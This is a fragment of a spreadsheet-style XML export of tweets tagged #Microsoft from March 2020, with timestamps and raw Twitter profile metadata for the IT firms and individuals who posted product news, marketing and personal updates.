    <t>{'id': 1196396733464481793, 'id_str': '1196396733464481793', 'name': 'Robin Hood', 'screen_name': 'robinhoodafrica', 'location': 'Worldwide', 'description': 'Exploring the vast waters of technology', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Mon Nov 18 11:56:59 +0000 2019', 'favourites_count': 94, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 124, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196396975232573442/eCjVGObd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196396975232573442/eCjVGObd_normal.png',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</si>
  <si>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14:00:10 +0000 2020</t>
  </si>
  <si>
    <t>Join us for a webinar to avoid the common pitfalls of going to the cloud and modernize your security. #webinar #tech #m365 #Microsoft #Security #IT #Innovation https://t.co/36CAhYi7IK https://t.co/4KNnsjjytx</t>
  </si>
  <si>
    <t>Tue Mar 03 14:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#Humantech uses #SQL Server on #Linux to reduce costs and boost efficiency - #Microsoft #Ergonomics https://t.co/tn5Px6Vps9 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 13:59:33 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 13:59:31 +0000 2020</t>
  </si>
  <si>
    <t>@refuturing @amichaelberman @daphneleprince @barroske One nice feature of Teams for #highered is #Microsoft's School Data Sync tool that provisions a Team for each class, updated as students add / drop the course. Anyone know if there are integrations with HRISs (e.g., Workday) that similarly provision department or workgroup Teams?</t>
  </si>
  <si>
    <t>{'id': 14563023, 'id_str': '14563023', 'name': 'Stephen Landry', 'screen_name': 'landryst', 'location': 'New Jersey, USA', 'description': 'A highered CIO interested in technology, education, edtech, outdoors, classical music, cigars, and bourbon. The views expressed are his own. RT != endorsement.', 'url': 'http://t.co/YF0pSgFmmR', 'entities': {'url': {'urls': [{'url': 'http://t.co/YF0pSgFmmR', 'expanded_url': 'http://stephenlandry.com', 'display_url': 'stephenlandry.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12085, 'friends_count': 11825, 'listed_count': 1096, 'created_at': 'Sun Apr 27 23:51:08 +0000 2008', 'favourites_count': 38375, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 58289,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'http://pbs.twimg.com/profile_images/378800000582856834/9bf63bbbde60b936c2dabf4ccad0cc32_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000582856834/9bf63bbbde60b936c2dabf4ccad0cc32_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14563023/1355715708',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</si>
  <si>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13:55:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers 5G Network Edge Compute Technology
 #ATT #Microsoft #AzureFamily
https://t.co/E9XbXrYlen</t>
  </si>
  <si>
    <t>Tue Mar 03 13:55:12 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft looks to give Yammer a new lease of life; can it?  https://t.co/eBAxDfuJEz #Microsoft #Yammer #Tech #Communities #STEM via @Computerworld</t>
  </si>
  <si>
    <t>Tue Mar 03 13:55:11 +0000 2020</t>
  </si>
  <si>
    <t>Details about the #XboxSeriesX from #gamestop! Just like last week with the #PS5, are you going to buy it? Which of the consoles do you think are worth it? 
#casualnerdom #microsoft 
Season 2: https://t.co/VBJ8lG3080 https://t.co/rRoGpBetyh</t>
  </si>
  <si>
    <t>{'id': 1036292678479212545, 'id_str': '1036292678479212545', 'name': 'Casual Nerdom', 'screen_name': 'CasualNerdom', 'location': '', 'description': '2 Dudes from Brooklyn who want you to know that we are all nerds of something. Webshow with co-pilots @adriandanielbk and @profound_effect #BlackPodcasts', 'url': 'https://t.co/xlj1rmkA88', 'entities': {'url': {'urls': [{'url': 'https://t.co/xlj1rmkA88', 'expanded_url': 'https://anchor.fm/casualnerdom', 'display_url': 'anchor.fm/casualnerdom', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Sun Sep 02 16:40:03 +0000 2018', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 188, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1096923729798549504/GoaMEcw4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096923729798549504/GoaMEcw4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1036292678479212545/1550363427',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</si>
  <si>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13:54:40 +0000 2020</t>
  </si>
  <si>
    <t>Honeywell says it will soon launch the worlds most powerful #quantum computer  TechCrunch 
#QuantumComputing #Google #IBM #Microsoft  https://t.co/WYQ7OCRlVw</t>
  </si>
  <si>
    <t>{'id': 29532294, 'id_str': '29532294', 'name': 'Mark Thiele', 'screen_name': 'mthiele10', 'location': 'Las Vegas NV', 'description': 'Carpe diem, quam minimum credula postero! Husband, Father, Friend, CIO, Startup Advisor, BoD member, Founder, Global Speaker, Scotch, Cigars, Coffee', 'url': 'https://t.co/Mhtq5QjnyR', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mhtq5QjnyR', 'expanded_url': 'http://www.edgevana.com', 'display_url': 'edgevana.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18277, 'friends_count': 2305, 'listed_count': 790, 'created_at': 'Tue Apr 07 20:12:02 +0000 2009', 'favourites_count': 28636, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 76192,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'http://pbs.twimg.com/profile_images/1226221925258551296/LD4lYcfZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226221925258551296/LD4lYcfZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29532294/1547830599',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</si>
  <si>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Tue Mar 03 13:50:03 +0000 2020</t>
  </si>
  <si>
    <t>What do you think? #Microsoft has already released two translucent Phantom #Xbox controllers in white and black, but now has the best colour yet: magenta!
https://t.co/ID4yoJbUXY? via @TheVerge 
#tech #gaming</t>
  </si>
  <si>
    <t>{'id': 293452141, 'id_str': '293452141', 'name': 'Net Technical Solutions', 'screen_name': 'NetTech_Farnham', 'location': 'Farnham', 'description': 'Vastly experienced in the IT industry providing cost effective, proactive IT Support &amp; Services and Software Development to SMEs.', 'url': 'http://t.co/g8zTrMRBEm', 'entities': {'url': {'urls': [{'url': 'http://t.co/g8zTrMRBEm', 'expanded_url': 'http://ntsols.com', 'display_url': 'ntsols.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 443, 'friends_count': 767, 'listed_count': 28, 'created_at': 'Thu May 05 11:23:30 +0000 2011', 'favourites_count': 1237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4667,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'http://pbs.twimg.com/profile_images/689408397142204416/CO5-BC5A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/689408397142204416/CO5-BC5A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/293452141/1486037577', 'profile_link_color': 'EC661C',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</si>
  <si>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13:47:03 +0000 2020</t>
  </si>
  <si>
    <t>How to Start a Video Chat in Teams.
Have a question about Teams? Check out our video playlist on YouTube or send us a message.
Video Playlist: https://t.co/aLgvu3O6Y9
#microsoft
#microsoftteams
https://t.co/TmsLohU8PF</t>
  </si>
  <si>
    <t>{'id': 102578895, 'id_str': '102578895', 'name': 'Omega Computer Services', 'screen_name': 'omegamsp', 'location': 'Portage, MI', 'description': 'Premier I.T. MSP in Michigan | We provide complete hardware, software and support solutions, enabling clients to operate their businesses more successfully.', 'url': 'https://t.co/M2OJ4cDKHY', 'entities': {'url': {'urls': [{'url': 'https://t.co/M2OJ4cDKHY', 'expanded_url': 'http://www.ocs.help', 'display_url': 'ocs.help', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 289, 'friends_count': 244, 'listed_count': 15, 'created_at': 'Thu Jan 07 04:47:49 +0000 2010', 'favourites_count': 144, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 534,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'http://pbs.twimg.com/profile_images/994554637167484929/Na3WUdTb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/994554637167484929/Na3WUdTb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102578895/1582927482', 'profile_link_color': '334029',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</si>
  <si>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13:45:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft mail app and copy and paste heavy and bad response and slow down and have issues</t>
  </si>
  <si>
    <t>Tue Mar 03 13:45:02 +0000 2020</t>
  </si>
  <si>
    <t>Cloud-based printing coming soon with Microsoft
#Azure #Microsoft #Cloud #CloudPrinting #Education
https://t.co/jfDDgWFg6f https://t.co/giyMBkwex3</t>
  </si>
  <si>
    <t>{'id': 906387444529950721, 'id_str': '906387444529950721', 'name': 'ThoughtCloud', 'screen_name': 'thoughtcloudinc', 'location': 'Calgary, Vancouver', 'description': 'Assisting Businesses on their Digital Transformation Journeys by using modern technology to work smarter, not harder. Microsoft, Nintex, and Valo Partner.', 'url': 'https://t.co/cg04aD1CaL', 'entities': {'url': {'urls': [{'url': 'https://t.co/cg04aD1CaL', 'expanded_url': 'http://www.thoughtcloud.ca', 'display_url': 'thoughtcloud.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 133, 'friends_count': 243, 'listed_count': 0, 'created_at': 'Sat Sep 09 05:23:01 +0000 2017', 'favourites_count': 105, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 226,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'http://pbs.twimg.com/profile_images/1062610065960525824/sKFclBqS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1062610065960525824/sKFclBqS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/906387444529950721/1566792857',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</si>
  <si>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13:44:29 +0000 2020</t>
  </si>
  <si>
    <t>Qualcomm to build #AzureSphere chips with Cellular connectivity
 #MCU #Qualcomm #Azure #Microsoft #AzureFamily
https://t.co/qFsw8BRjhv</t>
  </si>
  <si>
    <t>Tue Mar 03 13:41:40 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/IUH9DOdE3W</t>
  </si>
  <si>
    <t>Tue Mar 03 13:41:33 +0000 2020</t>
  </si>
  <si>
    <t>Computer repair service #computer #itsupport #computerrepair #fixcomputer #repair #laptop #windows #issues #support #hp #dell #ibm #microsoft 
https://t.co/61CR0j4XGm</t>
  </si>
  <si>
    <t>{'id': 1094024692426526720, 'id_str': '1094024692426526720', 'name': 'Power Food Health', 'screen_name': 'superfoods2019', 'location': 'Montreal, Canada', 'description': 'Your Guide To a happy and healthy lifestyle! Foods and Remedies That Heal And promote overall well being. Videos, Store, fitness, recipes, DIY and much more!', 'url': 'https://t.co/03Qg4GdATc', 'entities': {'url': {'urls': [{'url': 'https://t.co/03Qg4GdATc', 'expanded_url': 'https://powerfoodhealth.com/', 'display_url': 'powerfoodhealth.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2092, 'friends_count': 3499, 'listed_count': 5, 'created_at': 'Sat Feb 09 00:06:27 +0000 2019', 'favourites_count': 4450, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5101, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1179940724697112576/RvH_9Nb8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179940724697112576/RvH_9Nb8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1094024692426526720/1570152125',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</si>
  <si>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13:41:28 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 58% of data breaches take place at small businesses? Don't panicwe're here to help. Check out this infographic to see how our integrated #Microsoft security solutions can take your security measures to the next level. https://t.co/k7yMnpWxmH</t>
  </si>
  <si>
    <t>{'id': 441073723, 'id_str': '441073723', 'name': 'neteffect technologies', 'screen_name': 'neteffecttech', 'location': 'Charlotte, NC', 'description': 'neteffect technologies is a Managed Service Provider offering innovative voice and data solutions for the SMB market since 1991.', 'url': 'http://t.co/kaTM2BydVb', 'entities': {'url': {'urls': [{'url': 'http://t.co/kaTM2BydVb', 'expanded_url': 'http://www.ne-t.com', 'display_url': 'ne-t.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 95, 'friends_count': 122, 'listed_count': 4, 'created_at': 'Mon Dec 19 18:22:45 +0000 2011', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/638453592664313856/HCukHskj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/638453592664313856/HCukHskj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/441073723/1553601314', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '0D2959', 'profile_text_color': 'F58E34', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:41:24 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/3edzavdCzV</t>
  </si>
  <si>
    <t>{'id': 23869508, 'id_str': '23869508', 'name': 'Erez Zevulunov', 'screen_name': 'MITConsulting', 'location': 'Toronto', 'description': 'Entrepreneur in IT.  MIT Consulting specializes in fixing your IT problems.   All about out of the box thinking. https://t.co/lAvRtl04vF\n416-250-1040', 'url': 'https://t.co/lAvRtl04vF', 'entities': {'url': {'urls': [{'url': 'https://t.co/lAvRtl04vF', 'expanded_url': 'http://www.mitconsulting.ca', 'display_url': 'mitconsulting.ca', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/lAvRtl04vF', 'expanded_url': 'http://www.mitconsulting.ca', 'display_url': 'mitconsulting.ca', 'indices': [113, 136]}]}}, 'protected': False, 'followers_count': 849, 'friends_count': 1528, 'listed_count': 33, 'created_at': 'Thu Mar 12 01:29:11 +0000 2009', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5086, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2581BF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/661226804808552448/4tx_m2yh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/661226804808552448/4tx_m2yh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23869508/1446483734', 'profile_link_color': '2888C8', 'profile_sidebar_border_color': 'EBEBEB', 'profile_sidebar_fill_color': 'EBEBEB', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:41:18 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/0iQEJPtb28</t>
  </si>
  <si>
    <t>{'id': 38086920, 'id_str': '38086920', 'name': 'OS-Cubed, Inc.', 'screen_name': 'oscubed', 'location': 'Rochester, NY', 'description': 'OS-Cubed has expertise in the following areas: Entrepreneurial Software Development, \r\nDotNetNuke content-managed websites, Hosting services &amp; Technical support', 'url': 'http://t.co/Qqjkf66zLh', 'entities': {'url': {'urls': [{'url': 'http://t.co/Qqjkf66zLh', 'expanded_url': 'http://www.os-cubed.com', 'display_url': 'os-cubed.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 62, 'listed_count': 9, 'created_at': 'Wed May 06 02:08:21 +0000 2009', 'favourites_count': 541, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1758,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'http://pbs.twimg.com/profile_images/1252468202/logo_200_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1252468202/logo_200_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38086920/1469028109',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</si>
  <si>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13:41:12 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/URjw3Du0f2</t>
  </si>
  <si>
    <t>{'id': 196228647, 'id_str': '196228647', 'name': 'The Countess Group', 'screen_name': 'CountessGroup', 'location': 'Orlando, FL', 'description': '#Consultant #Speaker #Marketing #EmailMarketing #LinkedIn #LinkedInLocal #ConstantContact #Podcast - Join our mailing list at https://t.co/uGLpdV0FQa', 'url': 'https://t.co/rqFGcGeCq6', 'entities': {'url': {'urls': [{'url': 'https://t.co/rqFGcGeCq6', 'expanded_url': 'http://www.TheCountessGroup.com', 'display_url': 'TheCountessGroup.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/uGLpdV0FQa', 'expanded_url': 'http://bit.ly/join-the-list', 'display_url': 'bit.ly/join-the-list', 'indices': [126, 149]}]}}, 'protected': False, 'followers_count': 677, 'friends_count': 719, 'listed_count': 146, 'created_at': 'Tue Sep 28 16:45:58 +0000 2010', 'favourites_count': 245, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8459,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'http://pbs.twimg.com/profile_images/769221639707983873/5r1K8efb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/769221639707983873/5r1K8efb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/196228647/1472231511', 'profile_link_color': '009999',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</si>
  <si>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Tue Mar 03 13:40:28 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/t28zHyGgfC</t>
  </si>
  <si>
    <t>{'id': 3233951330, 'id_str': '3233951330', 'name': 'Douglas Grosfield', 'screen_name': 'FIVE_NINES_IT', 'location': 'Kitchener, Ontario', 'description': 'Serial entrepreneur, cloud &amp; tech evangelist, thought leader, writer &amp; speaker, voice-of-reason in tech sector, proud Constable with the WRPS Auxiliary Unit.', 'url': 'https://t.co/rxC3iuVbAe', 'entities': {'url': {'urls': [{'url': 'https://t.co/rxC3iuVbAe', 'expanded_url': 'http://www.fiveninesit.ca', 'display_url': 'fiveninesit.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 171, 'friends_count': 207, 'listed_count': 30, 'created_at': 'Tue Jun 02 18:35:19 +0000 2015', 'favourites_count': 1921, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3531,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'http://pbs.twimg.com/profile_images/938096908454604801/p8TmpGqT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/938096908454604801/p8TmpGqT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3233951330/1518109806',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</si>
  <si>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Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/uhpHHEcyyP</t>
  </si>
  <si>
    <t>{'id': 346950596, 'id_str': '346950596', 'name': 'INTELLAM ðŸ“ˆ', 'screen_name': 'Intellam', 'location': 'St Petersburg, FL', 'description': 'INTELLAM specializes in creating affordable, practical CRM and Business Intelligence solutions for small-to-mid sized businesses.', 'url': 'http://t.co/PDlNXLF9uw', 'entities': {'url': {'urls': [{'url': 'http://t.co/PDlNXLF9uw', 'expanded_url': 'http://www.intellam.com', 'display_url': 'intellam.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 100, 'friends_count': 27, 'listed_count': 5, 'created_at': 'Tue Aug 02 02:29:51 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 386,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'http://pbs.twimg.com/profile_images/793231170045677568/exwh2R7l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793231170045677568/exwh2R7l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/346950596/1477956125',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</si>
  <si>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13:40:11 +0000 2020</t>
  </si>
  <si>
    <t>Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/W9WnJLAQo1</t>
  </si>
  <si>
    <t>{'id': 1129480994, 'id_str': '1129480994', 'name': 'Setanta Solutions', 'screen_name': 'Setanta_Inc', 'location': 'Ottawa, Canada', 'description': 'SSI is an Eastern Ontario based IT Service Company servicing the SMB and Residential Sector with top quality and affordable prices.', 'url': 'http://t.co/1dx2botBcZ', 'entities': {'url': {'urls': [{'url': 'http://t.co/1dx2botBcZ', 'expanded_url': 'http://www.setantasolutions.com', 'display_url': 'setantasolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 116, 'listed_count': 7, 'created_at': 'Mon Jan 28 23:14:45 +0000 2013', 'favourites_count': 48, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1077,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'http://pbs.twimg.com/profile_images/816397394518556672/x77i7isJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/816397394518556672/x77i7isJ_normal.jpg', 'profile_link_color': '981CEB',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</si>
  <si>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Tue Mar 03 13:39:34 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365 #AdvancedThreatProtection, Ataira offers an email filtering service that delivers stronger protection against specific types of advanced threats. https://t.co/kWL4tbzPU6</t>
  </si>
  <si>
    <t>{'id': 4423098439, 'id_str': '4423098439', 'name': 'Ataira', 'screen_name': 'AtairaAnalytics', 'location': 'Redmond, WA', 'description': '#PowerBI #DataViz #BusinessIntelligence #BigData #Office365 #SharePoint #msPartner', 'url': 'https://t.co/5bEWzQ0Y1e', 'entities': {'url': {'urls': [{'url': 'https://t.co/5bEWzQ0Y1e', 'expanded_url': 'https://www.ataira.com', 'display_url': 'ataira.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 205, 'friends_count': 302, 'listed_count': 20, 'created_at': 'Tue Dec 01 18:24:43 +0000 2015', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 680,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'http://pbs.twimg.com/profile_images/1196860739236941824/X3GADP1b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196860739236941824/X3GADP1b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4423098439/1552322339',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</si>
  <si>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13:39:30 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, E and H Integrated Systems reduces your risk. https://t.co/4bHy8zcGPx</t>
  </si>
  <si>
    <t>{'id': 981611857579474944, 'id_str': '981611857579474944', 'name': 'EandH', 'screen_name': 'E_H_Integrated', 'location': 'Louisville, KY', 'description': 'Managed services, data networks, unified communications. All things Microsoft, Avaya and more.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Wed Apr 04 19:17:59 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 675,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'http://pbs.twimg.com/profile_images/981624545495797760/DgTBAEsM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981624545495797760/DgTBAEsM_normal.jpg',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</si>
  <si>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13:39:01 +0000 2020</t>
  </si>
  <si>
    <t>Yesterday my Son and I both became CERTIFIED.  He is now @Microsoft  Word &amp;amp; Excel certified and I'm now @awscloud  Advanced Networking Certified.  How cool is that.  Even better was watching him dedicate himself to a goal and achieving it.  #ProudDad #YOUNGLegacy #Microsoft #AWS https://t.co/HMp7svOwbL</t>
  </si>
  <si>
    <t>{'id': 19297368, 'id_str': '19297368', 'name': 'Gerald Young', 'screen_name': 'gbonics', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 165, 'friends_count': 251, 'listed_count': 4, 'created_at': 'Wed Jan 21 17:37:08 +0000 2009', 'favourites_count': 474, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1331,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'http://pbs.twimg.com/profile_images/865952282361425920/UGAb3G9g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/865952282361425920/UGAb3G9g_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19297368/1531903171',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</si>
  <si>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13:39:00 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/9fZE1xPloG</t>
  </si>
  <si>
    <t>Tue Mar 03 13:38:56 +0000 2020</t>
  </si>
  <si>
    <t>For #outlook n #MicrosoftPowerPoint #Microsoft https://t.co/t6qUrW8Zh5</t>
  </si>
  <si>
    <t>{'id': 1024220855050493952, 'id_str': '1024220855050493952', 'name': 'mctehÂ®', 'screen_name': 'YetToSee2', 'location': 'Selangor, Malaysia', 'description': 'Donâ€™t study me. You wonâ€™t graduate ðŸŽ“\n\nhttps://t.co/EYNTt6MVLw', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/EYNTt6MVLw', 'expanded_url': 'https://www.instagram.com/mektehpattatimo', 'display_url': 'instagram.com/mektehpattatimo', 'indices': [38, 61]}]}}, 'protected': False, 'followers_count': 7, 'friends_count': 44, 'listed_count': 0, 'created_at': 'Tue Jul 31 09:10:55 +0000 2018', 'favourites_count': 180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 154, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230136724400984070/kawsUPe-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230136724400984070/kawsUPe-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1024220855050493952/1581936444',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</si>
  <si>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13:38:17 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/6tMCAqmXr1</t>
  </si>
  <si>
    <t>Tue Mar 03 13:38:03 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/XwIsxAZqqw</t>
  </si>
  <si>
    <t>{'id': 2582960160, 'id_str': '2582960160', 'name': '1ComputerServices', 'screen_name': '1_C_S', 'location': 'Toronto and Barrie Area', 'description': '', 'url': 'http://t.co/UB4q0s5sSk', 'entities': {'url': {'urls': [{'url': 'http://t.co/UB4q0s5sSk', 'expanded_url': 'http://www.1computerservices.com', 'display_url': '1computerservices.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 82, 'friends_count': 685, 'listed_count': 0, 'created_at': 'Sun Jun 22 23:31:50 +0000 2014', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 345,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'http://pbs.twimg.com/profile_images/1182454969028567041/Zjug-Clo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182454969028567041/Zjug-Clo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2582960160/1432063068',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</si>
  <si>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13:37:33 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/5mt0FqNrAl</t>
  </si>
  <si>
